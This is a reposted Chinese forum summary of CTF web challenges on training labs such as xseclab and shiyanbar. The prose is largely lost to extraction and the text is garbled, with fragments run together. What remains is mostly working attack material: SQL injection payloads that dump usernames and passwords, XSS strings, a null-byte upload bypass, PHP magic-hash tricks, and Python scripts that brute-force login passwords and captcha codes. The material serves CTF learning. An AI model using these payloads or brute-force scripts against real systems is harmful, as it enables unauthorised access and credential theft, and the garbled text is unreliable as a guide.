[21029] 2020-05-14_CTFweb总结

文档创建者:s7ckTeam
浏览次数:9
最后更新:2025-01-18
2020-05-14_CTFweb总结 C T F   w e b L e m o n S e c   2 0 2 0 - 0 5 - 1 4 h t t p : / / b l o g . c s d n . n e t / u 0 1 2 7 6 3 7 9 4 / a r t i c l e / d e t a i l s / 5 0 9 5 9 1 6 6   1 .   h t t p : / / l a b 1 . x s e c l a b . c o m / b a s e 1 _ 4 a 4 d 9 9 3 e d 7 b d 7 d 4 6 7 b 2 7 a f 5 2 d 2 a a a 8 0 0 / i n d e x . p h p   2 . H T T P   R e f e r e r X - F o r w a r d e d - F o r i p U s e r - A g e n t h t t p : / / l a b 1 . x s e c l a b . c o m / b a s e 6 _ 6 0 8 2 c 9 0 8 8 1 9 e 1 0 5 c 3 7 8 e b 9 3 b 6 6 3 1 c 4 d 3 / i n d e x . p h p / / . n e t 9 . N E T   C L R   9   A c c e p t - L a n g u a g e h t t p : / / l a b 1 . x s e c l a b . c o m / b a s e 1 _ 0 e f 3 3 7 f 3 a f b e 4 2 d 5 6 1 9 d 7 a 3 6 c 1 9 c 2 0 a b / i n d e x . p h p h t t p : / / c t f 1 . s h i y a n b a r . c o m / b a s i c / h e a d e r / C o o k i e h t t p : / / l a b 1 . x s e c l a b . c o m / b a s e 9 _ a b 6 2 9 d 7 7 8 e 3 a 2 9 5 4 0 d f d 6 0 f 2 e 5 4 8 a 5 e b / i n d e x . p h p
3 . H T T P   h t t p : / / l a b 1 . x s e c l a b . c o m / b a s e 7 _ e b 6 8 b d 2 f 0 d 7 6 2 f a f 7 0 c 8 9 7 9 9 b 3 c 1 c c 5 2 / i n d e x . p h p h t t p : / / c t f 1 . s h i y a n b a r . c o m / b a s i c / c a t c h /   4 . 3 0 2 h t t p : / / l a b 1 . x s e c l a b . c o m / b a s e 8 _ 0 a b d 6 3 a a 5 4 b e f 0 4 6 4 2 8 9 d 6 a 4 2 4 6 5 f 3 5 4 / i n d e x . p h p   5 .   6 . j a v a s c r i p t   h t t p : / / l a b 1 . x s e c l a b . c o m / b a s e 1 0 _ 0 b 4 e 4 8 6 6 0 9 6 9 1 3 a c 9 c 3 a 2 2 7 2 d d e 2 7 2 1 5 / i n d e x . p h p 7 . 使 b u r p r e p e a t e r H T T P h t t p : / / l a b 1 . x s e c l a b . c o m / x s s 1 _ 3 0 a c 8 6 6 8 c d 4 5 3 e 7 e 3 8 7 c 7 6 b 1 3 2 b 1 4 0 b b / i n d e x . p h p  
8 . j a v a s c r i p t h t t p : / / c t f 1 . s h i y a n b a r . c o m / b a s i c / j s / i n d e x . a s p 9 . r o b o t s . t x t h t t p : / / l a b 1 . x s e c l a b . c o m / b a s e 1 2 _ 4 4 f 0 d 8 a 9 6 e e d 2 1 a f d c 4 8 2 3 a 0 b f 1 a 3 1 6 b / i n d e x . p h p y o u   f i n d   m e , b u t   I   a m   n o t   t h e   l o g i n   p a g e .   k e e p   s e a r c h . l o g i n   p a g e h t t p : / / l a b 1 . x s e c l a b . c o m / b a s e 1 2 _ 4 4 f 0 d 8 a 9 6 e e d 2 1 a f d c 4 8 2 3 a 0 b f 1 a 3 1 6 b / 9 f b 9 7 5 3 1 f e 9 5 5 9 4 6 0 3 a f f 7 e 7 9 4 a b 2 f 5 f / / l o g i n . p h p 1 0 . . b a s h _ h i s t o r y l i n u x   j s h t t p : / / c t f 5 . s h i y a n b a r . c o m / D U T C T F / 1 . h t m l   / / F 1 2
X S S h t t p : / / l a b 1 . x s e c l a b . c o m / r e a l x s s 1 _ f 1 2 3 c 1 7 d d 9 c 3 6 3 3 3 4 6 7 0 1 0 1 7 7 9 1 9 3 9 9 8 / i n d e x . p h p h t t p : / / l a b 1 . x s e c l a b . c o m / r e a l x s s 2 _ b c e d a b a 7 e 8 6 1 8 c d f b 5 1 1 7 8 7 6 5 0 6 0 f c 7 d / i n d e x . p h p j q u e r y h t t p : / / l a b 1 . x s e c l a b . c o m / r e a l x s s 3 _ 9 b 2 8 b 0 f f 9 3 d 0 b 0 0 9 9 f 5 a c 7 f 8 b a d 3 f 3 6 8 / i n d e x . p h p   a s p 1 . h t t p : / / c t f 8 . s h i y a n b a r . c o m / a s p a u d i t /   : F 1 2 m a x l e n g t h / / U s e r n a m e     ' u n i o n     s e l e c t   1 , 1 , 1   f r o m   b d m i n   '     i d 3 4 . . . u n i o n 1 , 1 , 1 1         ' u n i o n     s e l e c t   1 , 1 , 1   f r o m   b d m i n   w h e r e   ' 1 ' = ' 1 p h p 1 . h t t p : / / c t f 8 . s h i y a n b a r . c o m / p h p a u d i t /   / / h t t p X - F o r w a r d e d - F o r 2 . h t t p : / / c t f 1 . s h i y a n b a r . c o m / w e b / 4 / i n d e x . p h p   / / 3 . h t t p : / / c t f 5 . s h i y a n b a r . c o m / D U T C T F / i n d e x . p h p   / / u r l e n c o d e 4 . h t t p : / / c t f 1 . s h i y a n b a r . c o m / w e b / 5 / i n d e x . p h p   / / 5 . h t t p : / / c t f 4 . s h i y a n b a r . c o m / w e b / f a l s e . p h p   / / n u l l 6 . h t t p : / / c t f 4 . s h i y a n b a r . c o m / w e b / S e s s i o n . p h p   / / p a s s w o r d = 访 $ _ S E S S I O N [ ' p a s s w o r d ' ] = =   h t t p : / / c t f 1 0 . s h i y a n b a r . c o m : 8 8 8 8 / m a i n . p h p $ . p o s t ( " . / g e t k e y . p h p ? o k = 1 " , { ' u r l ' : l o c a t i o n . h r e f , ' o k ' : o k } , f u n c t i o n ( d a t a ) {                                                             c o n s o l e . l o g ( d a t a ) ;                 } ) ; s h o w k e y ( ) ; < s c r i p t > a l e r t ( H a c k i n g L a b ) < / s c r i p t > < i m g     o n e r r o r = a l e r t ( H a c k i n g L a b ) >
s q l k o s q l m a p - 1 0 s q l 1 . h t t p : / / c t f 5 . s h i y a n b a r . c o m : 8 0 8 0 / 9 / a s p . a s p   2 . h t t p : / / c t f 5 . s h i y a n b a r . c o m / 8 / i n d e x . p h p ? i d = 1 a n d   X X 3 . h t t p : / / l a b 1 . x s e c l a b . c o m / s q l i 2 _ 3 2 6 5 b 4 8 5 2 c 1 3 3 8 3 5 6 0 3 2 7 d 1 c 3 1 5 5 0 b 6 0 / i n d e x . p h p 便 4 . h t t p : / / l a b 1 . x s e c l a b . c o m / s q l i 3 _ 6 5 9 0 b 0 7 a 0 a 3 9 c 8 c 2 7 9 3 2 b 9 2 b 0 e 1 5 1 4 5 6 / i n d e x . p h p p a y l o a d h t t p : / / l a b 1 . x s e c l a b . c o m / s q l i 3 _ 6 5 9 0 b 0 7 a 0 a 3 9 c 8 c 2 7 9 3 2 b 9 2 b 0 e 1 5 1 4 5 6 / i n d e x . p h p ? i d = 1   o r   1 = 1 5 . h t t p : / / l a b 1 . x s e c l a b . c o m / s q l i 4 _ 9 b 5 a 9 2 9 e 0 0 e 1 2 2 7 8 4 e 4 4 e d d f 2 b 6 a a 1 a 0 / i n d e x . p h p ? i d = 1 C o n t e n t - T y p e t e x t / h t m l ;   c h a r s e t = g b 2 3 1 2 p a y l o a d h t t p : / / l a b 1 . x s e c l a b . c o m / s q l i 4 _ 9 b 5 a 9 2 9 e 0 0 e 1 2 2 7 8 4 e 4 4 e d d f 2 b 6 a a 1 a 0 / i n d e x . p h p ? i d = 1 % a 0 % 2 7   o r   1 = 1   l i m i t   2 , 1 % 2 3   6 . h t t p : / / l a b 1 . x s e c l a b . c o m / s q l i 5 _ 5 b a 0 b b a 6 a 6 d 1 b 3 0 b 9 5 6 8 4 3 f 7 5 7 8 8 9 5 5 2 / i n d e x . p h p ? s t a r t = 0 & n u m = 1 h t t p : / / l a b 1 . x s e c l a b . c o m / s q l i 5 _ 5 b a 0 b b a 6 a 6 d 1 b 3 0 b 9 5 6 8 4 3 f 7 5 7 8 8 9 5 5 2 / i n d e x . p h p ? s t a r t = 7 & n u m = 1   p r o c e d u r e   a n a l y s e ( e x t r a c t v a l u e ( 1 , c o n c a t ( 0 x 3 a , d a t a b a s e ( ) ) ) , 1 )           m y d b s h t t p : / / l a b 1 . x s e c l a b . c o m / s q l i 5 _ 5 b a 0 b b a 6 a 6 d 1 b 3 0 b 9 5 6 8 4 3 f 7 5 7 8 8 9 5 5 2 / i n d e x . p h p ? s t a r t = 7 & n u m = 1   p r o c e d u r e   a n a l y s e ( e x t r a c t v a l u e ( 1 , c o n c a t ( 0 x 3 a , ( s e l e c t   t a b l e _ n a m e   f r o m   i n f o r m a t i o n _ s c h e m a . t a b l e s   w h e r e t a b l e _ s c h e m a = 0 x 6 d 7 9 6 4 6 2 7 3   l i m i t   0 , 1   ) ) ) , 1 ) h t t p : / / l a b 1 . x s e c l a b . c o m / s q l i 5 _ 5 b a 0 b b a 6 a 6 d 1 b 3 0 b 9 5 6 8 4 3 f 7 5 7 8 8 9 5 5 2 / i n d e x . p h p ? s t a r t = 7 & n u m = 1   p r o c e d u r e   a n a l y s e ( e x t r a c t v a l u e ( 1 , c o n c a t ( 0 x 3 a , ( s e l e c t   c o n c a t ( u s e r n a m e , 0 x 3 a , p a s s w o r d )   f r o m   u s e r   l i m i t   2 , 1 ) ) ) , 1 )   Y o u   m u s t   d o   i t   a s   f a s t   a s   y o u   c a n ! p o s t k e y = X X X X X X X X X X X X X h t t p : / / c t f 4 . s h i y a n b a r . c o m / w e b / 1 0 . p h p   / / / / a n d h t t p : / / c t f 5 . s h i y a n b a r . c o m / 8 / i n d e x . p h p ? i d = 1 % 2 0 a n d % 2 0 1 = 1 h t t p : / / c t f 5 . s h i y a n b a r . c o m / 8 / i n d e x . p h p ? i d = 1 % 2 0 a n d % 2 0 1 = 2 / / h t t p : / / c t f 5 . s h i y a n b a r . c o m / 8 / i n d e x . p h p ? i d = 1 % 2 0 o r d e r % 2 0 b y % 2 0 3 h t t p : / / c t f 5 . s h i y a n b a r . c o m / 8 / i n d e x . p h p ? i d = 1 % 2 0 o r d e r % 2 0 b y % 2 0 2 / / ( / / c o n c a t _ w s C H A R ( 5 8 ) A S C I I 5 8 ) h t t p : / / c t f 5 . s h i y a n b a r . c o m / 8 / i n d e x . p h p ? i d = 1 % 2 0 a n d % 2 0 1 = 2 % 2 0 u n i o n % 2 0 s e l e c t % 2 0 1 , c o n c a t _ w s ( C H A R ( 5 8 ) , u s e r ( ) , d a t a b a s e ( ) , v e r s i o n ( ) )   / / , t a b l e _ s c h e m a ( m y s q l 1 6 ) h t t p : / / c t f 5 . s h i y a n b a r . c o m / 8 / i n d e x . p h p ? i d = 1 % 2 0 a n d % 2 0 1 = 2 % 2 0 u n i o n % 2 0 s e l e c t % 2 0 1 , t a b l e _ n a m e % 2 0 f r o m % 2 0 i n f o r m a t i o n _ s c h e m a . t a b l e s % 2 0 w h e r e % 2 0 t a b l e _ s c h e m a = 0 x 6 d 7 9 5 f 6 4 6 2 / / h t t p : / / c t f 5 . s h i y a n b a r . c o m / 8 / i n d e x . p h p ? i d = 1   a n d   1 = 2   u n i o n   s e l e c t   1 , c o l u m n _ n a m e   f r o m   i n f o r m a t i o n _ s c h e m a . c o l u m n s   w h e r e   t a b l e _ n a m e = 0 x 7 4 6 8 6 9 7 3 6 b 6 5 7 9 / / h t t p : / / c t f 5 . s h i y a n b a r . c o m / 8 / i n d e x . p h p ? i d = 1   a n d   1 = 2   u n i o n   s e l e c t   1 , k 0 y   f r o m   t h i s k e y i m p o r t   r e q u e s t s   i m p o r t   b a s e 6 4   u r l = ' h t t p : / / c t f 4 . s h i y a n b a r . c o m / w e b / 1 0 . p h p '   r e q = r e q u e s t s . g e t ( u r l ) p r i n t   r e q . t e x t k e y = r e q . h e a d e r s [ ' F L A G ' ] k e y = b a s e 6 4 . b 6 4 d e c o d e ( k e y ) k e y = k e y . s p l i t ( ' : ' ) [ 1 ] . s t r i p ( ) d a t a = { ' k e y ' : k e y } r = r e q u e s t s . p o s t ( u r l , d a t a = d a t a )   p r i n t ( r . t e x t )
s q l a n d   ( p w = ' $ p a s s ' )   p a y l o a d     u s e r = a d m i n ' ) # & p a s s = 4 3 2 1 4 2 1 . h t t p : / / c t f 1 . s h i y a n b a r . c o m / w e b / 4 / i n d e x . p h p   2 . h t t p : / / c t f 1 . s h i y a n b a r . c o m / w e b / 5 / i n d e x . p h p / / a s p u s e r = '   u n i o n   s e l e c t   ' c 4 c a 4 2 3 8 a 0 b 9 2 3 8 2 0 d c c 5 0 9 a 6 f 7 5 8 4 9 b '     f r o m   p h p   - - & p a s s = 1 M D 5 1 m d 5 h t t p : / / w w w . s h i y a n b a r . c o m / c t f / 1 7 6 0 h t t p : / / c t f 4 . s h i y a n b a r . c o m / w e b / u p l o a d     / / 0 0       / u p l o a d s / s d f . p h p + 0 0   m u l t i p a r t / f o r m - d a t a p h p 1 .   t r u e     f a l s e p h p 0   i n t v a l ( ' ' 1 2 3 a b d 4 5 g f ) 1 2 3   2 . m d 5 p h p   0 e = = = = = t r u e m d 5 0 e 2 4 0 6 1 0 7 0 8 Q N K C D Z O a a b g 7 X S s a a b C 9 R q S   3 . m d 5 m d 5 ( a r r a y )   = =   N U L L   4 . s t r c m p ( a r r a y , s t r i n g )   = =   5 . r e g i s t e r _ g l o b a l s O n 使 O f f P H P 4 P H P 5 e x t r a c t h t t p : / / w w w . w 3 s c h o o l . c o m . c n / p h p / f u n c _ a r r a y _ e x t r a c t . a s p 6 . e r e g 0 0 % 0 0   h t t p : / / w w w . s h i y a n b a r . c o m / c t f / 1 8 0 5 . b a k       u l t r o e d i t . . . . ~ . x x x x . p h p . s w p     . x x x x . p h p . s w o         v i m p r i n t ( r . t e x t ) $ c i p h e r   =   ' a 1 z L b g Q s C E S E I q R L w u Q A y M w L y q 2 L 5 V w B x q G A 3 R Q A y u m Z 0 t m M v S G M 2 Z w B 4 t w s ' ; $ t m p   =   b a s e 6 4 _ d e c o d e ( s t r r e v ( s t r _ r o t 1 3 ( $ c i p h e r ) ) ) ; e c h o   $ t m p ; $ b   =   ' ' ; f o r   ( $ i = 0 ;   $ i   <   s t r l e n ( $ t m p ) ;   $ i + + )   {       $ a   =   s u b s t r ( $ t m p ,   $ i ,   1 ) ;     $ b   =   $ b . c h r ( o r d ( $ a ) - 1 ) ; } e c h o   s t r r e v ( $ b ) ; v a r _ d u m p (   0   = =   " a "   ) ;   v a r _ d u m p (   " 0 "   = =   " a "   ) ; v a r _ d u m p ( " 0 e 4 6 2 0 9 7 4 3 1 9 0 6 8 5 4 " = = " 0 e 8 3 0 4 0 0 4 1 " ) ;         m d 5 ( ' 2 4 0 6 1 0 7 0 8 ' )   0 e 4 6 2 0 9 7 4 3 1 9 0 6 5 0 9 0 1 9 5 6 2 9 8 8 7 3 6 8 5 4           m d 5 ( ' Q N K C D Z O ' )   0 e 8 3 0 4 0 0 4 5 1 9 9 3 4 9 4 0 5 8 0 2 4 2 1 9 9 0 3 3 9 1
h t t p : / / l a b 1 . x s e c l a b . c o m / v c o d e 1 _ b c f e f 7 e a c f 7 b a d c 6 4 a a f 1 8 8 4 4 c d b 1 c 4 6 / i n d e x . p h p   h t t p : / / l a b 1 . x s e c l a b . c o m / v c o d e 2 _ a 6 e 6 b a c 0 b 4 7 c 8 1 8 7 b 0 9 d e b 2 0 b a b c 0 e 8 5 / i n d e x . p h p     ' ' h t t p : / / l a b 1 . x s e c l a b . c o m / v c o d e 3 _ 9 d 1 e a 7 a d 5 2 a d 9 3 c 0 4 a 8 3 7 e 0 8 0 8 b 1 7 0 9 7 / i n d e x . p h p       h t t p : / / l a b 1 . x s e c l a b . c o m / v c o d e 6 _ m o b i _ b 4 6 7 7 2 9 3 3 e b 4 c 8 b 5 1 7 5 c 6 7 d b c 4 4 d 8 9 0 1 /         i m p o r t   r e q u e s t s                   u r l   =   " h t t p : / / l a b 1 . x s e c l a b . c o m / v c o d e 1 _ b c f e f 7 e a c f 7 b a d c 6 4 a a f 1 8 8 4 4 c d b 1 c 4 6 / l o g i n . p h p "         r e q   =   r e q u e s t s . s e s s i o n ( )         h e a d e r   =   { " C o o k i e " : " P H P S E S S I D = 9 b 8 f 8 6 8 6 2 6 9 f 5 d 7 0 a 4 4 7 6 6 e 3 c 5 f 4 d c d c " }         f o r   p w d   i n   x r a n g e ( 1 0 0 0 , 1 0 0 0 0 ) :                       d a t a = { ' u s e r n a m e ' : ' a d m i n ' , ' p w d ' : p w d , ' v c o d e ' : ' c 3 p e ' }                       r e t   =   r e q . p o s t ( u r l ,   d a t a = d a t a ,   h e a d e r s = h e a d e r )             p r i n t   r e t . t e x t             i f   ' e r r o r '   n o t   i n   r e t . t e x t :                 p r i n t   p w d                 b r e a k         i m p o r t   r e q u e s t s                   u r l   =   " h t t p : / / l a b 1 . x s e c l a b . c o m / v c o d e 2 _ a 6 e 6 b a c 0 b 4 7 c 8 1 8 7 b 0 9 d e b 2 0 b a b c 0 e 8 5 / l o g i n . p h p "         r e q   =   r e q u e s t s . s e s s i o n ( )         h e a d e r   =   { " C o o k i e " : " P H P S E S S I D = 3 c 3 9 9 4 0 d a 5 0 b 5 1 4 0 3 8 b 3 e 9 9 7 1 e e 5 f 5 7 e " }                   f o r   p w d   i n   x r a n g e ( 1 0 0 0 , 1 0 0 0 0 ) :             d a t a = { ' u s e r n a m e ' : ' a d m i n ' , ' p w d ' : p w d , ' v c o d e ' : ' ' }             r e t   =   r e q . p o s t ( u r l ,   d a t a = d a t a ,   h e a d e r s = h e a d e r )                         i f   ' e r r o r '   n o t   i n   r e t . t e x t :                 p r i n t   r e t . t e x t                 p r i n t   " g o o d :   p a s s w o r d   i s : "   +   s t r ( p w d )                 b r e a k             e l s e :                 p r i n t   " t r y : "   +   s t r ( p w d )   +   "   a n d   r e s u l t   i s   : " +   r e t . t e x t i m p o r t   r e q u e s t s   u r l   =   " h t t p : / / l a b 1 . x s e c l a b . c o m / v c o d e 6 _ m o b i _ b 4 6 7 7 2 9 3 3 e b 4 c 8 b 5 1 7 5 c 6 7 d b c 4 4 d 8 9 0 1 / l o g i n . p h p " r e q   =   r e q u e s t s . s e s s i o n ( ) h e a d e r   =   { " C o o k i e " : " P H P S E S S I D = 6 1 5 5 6 a 5 b 2 a 6 c 2 a 0 3 a 2 f 3 5 b 1 9 9 c b b 5 3 6 4 " } f o r   v c o d e   i n   x r a n g e ( 1 0 0 , 1 0 0 0 ) :     d a t a = { ' u s e r n a m e ' : ' 1 3 3 8 8 8 8 6 6 6 6 ' , ' v c o d e ' : v c o d e ,   ' L o g i n ' : ' s u b m i t ' }     #   d a t a = { ' u s e r n a m e ' : ' 1 3 3 9 9 9 9 9 9 9 9 ' , ' v c o d e ' : v c o d e ,   ' L o g i n ' : ' s u b m i t ' }     r e t   =   r e q . p o s t ( u r l ,   d a t a = d a t a ,   h e a d e r s = h e a d e r )         i f   ' e r r o r '   n o t   i n   r e t . t e x t :         p r i n t   r e t . t e x t         p r i n t   " g o o d :   v c o d e   i s : "   +   s t r ( v c o d e )         b r e a k     e l s e :         p r i n t   " t r y : "   +   s t r ( v c o d e )   +   "   a n d   r e s u l t   i s   : " +   r e t . t e x t
h t t p : / / b l o g . c s d n . n e t / u 0 1 2 7 6 3 7 9 4 / a r t i c l e / d e t a i l s / 5 0 9 5 9 1 6 6
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则